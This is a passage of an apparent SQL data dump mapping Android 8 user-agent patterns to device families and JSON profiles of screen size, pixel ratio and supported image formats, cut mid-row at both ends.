Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X230) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X3-KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X50A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X50L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X52X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X540) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X5_Soul) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X5_Soul_Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X5_Soul_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X5_Soul_Style) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X60L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":683,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":755,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X90) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; XP8800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; XP9800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; XT1635-01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; XT1635-02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; XT1650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; XT1710-02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X_TIGI_A2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X_TIGI_JOY7_TV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":400,\"screenHeight\":683,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X_TIGI_V16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X_TIGI_V16_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; X_TIGI_V19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Y7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Y7Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; YNDX-000SB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Young Y56) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z2_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z455) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z5031O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z557BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z559DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z60s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z61) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z6400C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z81) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Z9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZA550KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZB555KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZB602KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZB631KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZB633KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZC520KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZC553KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZC554KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZE520KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZE552KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZE553KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZE554KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZE620KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZS550KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE A2017) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE A2017G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE A2017U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE A2019G Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE BLADE A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE BLADE A530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE BLADE V0920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE BLADE V9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE Blade A0722) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZTE Blade A531) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZUK Z1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZUK Z2121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZUK Z2131) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ZUK Z2151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; d-02K) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; i5014) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; i5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; iLA_Silk) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 